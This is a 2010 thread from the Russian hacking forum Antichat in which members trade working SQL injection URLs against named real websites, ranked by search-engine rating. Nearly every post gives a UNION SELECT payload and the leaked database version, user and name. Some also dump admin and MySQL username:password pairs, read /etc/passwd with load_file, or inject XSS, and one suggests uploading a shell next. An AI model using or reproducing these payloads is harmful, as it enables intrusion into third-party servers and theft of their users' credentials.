HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12431  
Старый 20.06.2010, 22:53
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://ipsnorthamerica.net/news.php?idnews=2694+and+1=0+union+select+1,2,3,4, concat_ws(char(32,58,32),user(),version(),database (),@@version_compile_os),6,7,8,9,10,11,12,13,14,15

PR-6
 
Ответить с цитированием

  #12432  
Старый 21.06.2010, 00:50
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Код:
Code:
http://swc.com.ua/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,12,3,4+--+
Version: 4.1.22-standard-log

Database: student_SWC

User: student_user@localhost

PR - 1

ТИЦ - 10

Вот юзеры:

Код:
Code:
http://swc.com.ua/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28username,0x3a,password%29,2,3,4+from+jos_users--
Только в админку доступа нет, идет редирект на морду.
 
Ответить с цитированием

  #12433  
Старый 21.06.2010, 02:20
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

Код:
Code:
http://www.crie.min-edu.pt/index.php?section=162-999.9+union+select+1,2,3,4,5,6,7,8,concat_ws(user(),version(),database()),10,11,12,13,14--
PR 7

вывод сверху

version - 4.1.22

user - mde@localhost

database - mde

Код:
Code:
http://www.hbtheusden.nl/Content/base.php?ID=10-999.9+union+select+1,2,concat_ws(user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15--
PR 4

вывод тоже сверху

version - 5.0.67

user - hbvt_hbvt@localhost

database - hbvt_Hbt

P.S. Мой первый скуль в паблике и надеюсь не байанный и не последний...
 
Ответить с цитированием

  #12434  
Старый 21.06.2010, 03:15
rbul
Новичок
Регистрация: 19.05.2010
Сообщений: 4
Провел на форуме:
188246

Репутация: 1
По умолчанию

PR 5

Код:
Code:
http://www.readingmatters.co.uk/book2.php?id=-235+union+select+1,concat_ws%280x3a,version%28%29,database%20%28%29,user%28%29%29,3,4,5,6,7,8,9%20--
version : 5.0.67-community-log

database : readingmatters

user: davidmarshall@localhost
 
Ответить с цитированием

  #12435  
Старый 21.06.2010, 03:26
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

pechory.library.ru

PR - 8

ТиЦ - 5400

MySQL 4.1.20

LOAD FILE:

Код:
Code:
http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10+from+mysql.user+--
с ковычками проблем нет)

---------------------------------------------------------

Sql Inj XSS:

Код:
Code:
http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,2,3,4,5,'alert();',7,8,9,10+from+mysql.user+--
---------------------------------------------------------

all:

Код:
Code:
http://pechory.library.ru/cls/smi/article.php?id=12+union+select+1,2,3,4,5,6,group_concat(0x0b,user,0x3a,password,0x3a,host,0x3a,file_priv),8,9,concat_ws(0x3a,@@version_compile_os,0x3a,user(),0x3a,version(),0x3a,database())+from+mysql.user+--
Вам осталось только раскрыть пути и залить шелл=)
 
Ответить с цитированием

  #12436  
Старый 21.06.2010, 14:31
oiki
Новичок
Регистрация: 21.01.2010
Сообщений: 15
Провел на форуме:
67426

Репутация: 0
По умолчанию

http://www.adaderana.lk/show.php?prid=-4+UNION+SELECT+concat_ws(user(),version(),database ())--

вывод в названии картинки

PR4

http://www.anca.org/press_releases/press_releases.php?prid=-999.9+UNION+SELECT+1,concat_ws(user(),version(),da tabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

тиц 50 pr 6
 
Ответить с цитированием

  #12437  
Старый 21.06.2010, 14:48
oiki
Новичок
Регистрация: 21.01.2010
Сообщений: 15
Провел на форуме:
67426

Репутация: 0
По умолчанию

http://www.mordauntshort.com/press_releases.php?PRID=7

7 AND %тут выражение%

Current DB: mordauntshort2007

Tables: ms_admin

id: 1

username: ChrisSoutham

password:

ТИЦ70(R3) PR4
 
Ответить с цитированием

  #12438  
Старый 21.06.2010, 15:49
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

Сборочка

accordsalud.com.ar pr 3

Код:
Code:
http://www.accordsalud.com.ar/php/turismo/destinos/alojamientos.php?id=34-999.9+union+select+1,2,concat_ws(user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16--
version - 5.1.3.8-community

user - up@localhost

database - accord_salud


vvaltena.nl тиц 10 pr 2

Код:
Code:
http://www.vvaltena.nl/default.php?id=47-999.9+union+select+1,concat_ws(user(),version(),database()),3--
version - 5.1.47

user - vvaltena@net3-nl-iis-94.ad.vevida.net

database - vvaltena


newmexicocreates.org pr 5

Код:
Code:
http://newmexicocreates.org/artists.php?id=1146-999.9+union+select+1,2,3,concat_ws(user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17--
version - 4.1.22

user - mnmadmin@que.newmex.com

database - mnmfdb


pustin2000.ru pr 2

Код:
Code:
http://www.pustin2000.ru/material.php?id=7-999.9+union+select+1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9--
version - 4.1.25

user - pustin20@localhost

database - wwwpustin2000ru


polymery.ru тиц 60 pr 4

Код:
Code:
http://www.polymery.ru/material.php?id=3-999.9+union+select+1,concat_ws(user(),version(),database()),3--
version - 5.0.88

user - u44790@10.8.2.20

database - u44790


worldmusicinstitute.org тиц 10 pr 4

Код:
Code:
http://www.worldmusicinstitute.org/event.php?id=906-999.9+union+select+1,2,3,4,5,6,7,8,concat_ws(user(),version(),database()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74--
version - 4.1.25-Debian_mt1-log

user - worldmusicinst@64.13.192.29

database - worldmusicinstitute_org_-_ucms


klimt02.net pr 5

Код:
Code:
http://www.klimt02.net/jewellers/index.php?item_id=11203-999.9+union+select+1,2,3,4,5,6,concat_ws(user(),version(),database()),8--
version - 5.0.67-community

user - klimt03_01@localhost

database - klimt03_01


thermos-russia.ru 20 тиц , pr 2

Код:
Code:
http://www.thermos-russia.ru/showimg.php?id=68-999.9+union+select+1,2,3,4,5,6,7,concat_ws(user(),version(),database()),9,10,11,12--
version - 4.0.26

user - thermo@aqua.di-net.ru

database - thermo


futureevents.ru тиц 20

Код:
Code:
http://www.futureevents.ru/event.php?id=86-999.9+union+select+1,concat_ws(user(),version(),database()),3,4,5,6,7--
version - 5.0.45-community

user - ntsison@localhost

database - sison


cosplay.compgamer.com pr 3

Код:
Code:
http://cosplay.compgamer.com/readnews.php?id=4848-999.9+union+select+1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--
version - 5.0.45-log

user - compgamer_com@localhost

database - compgamer_com_2


P.S. Всё тщательно проверял на бойанность,но если где-то пропустил,извиняйте!
 
Ответить с цитированием

  #12439  
Старый 21.06.2010, 20:30
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.wordsfromreuben.com/2009/songs.php?rid=17+union+select+1,2,concat_ws(0x3a,u ser(),version(),database(),@@version_compile_os),4 ,5,6,7

PR-4
 
Ответить с цитированием

  #12440  
Старый 21.06.2010, 20:45
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

РЕЧФЛОТ

http://www.rechflot.ru/page/static.php?pn=-21+and+1=2+union+select+1,2,concat_ws(0x3a,version (),user(),database(),@@version_compile_os),4+--

version : 5.0.67-log

user : h2rechf_mainuser@www5.100mb.ru

database : :h2rechf_rechflot

os : portbld-freebsd6.2

таблица users

/admin/...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ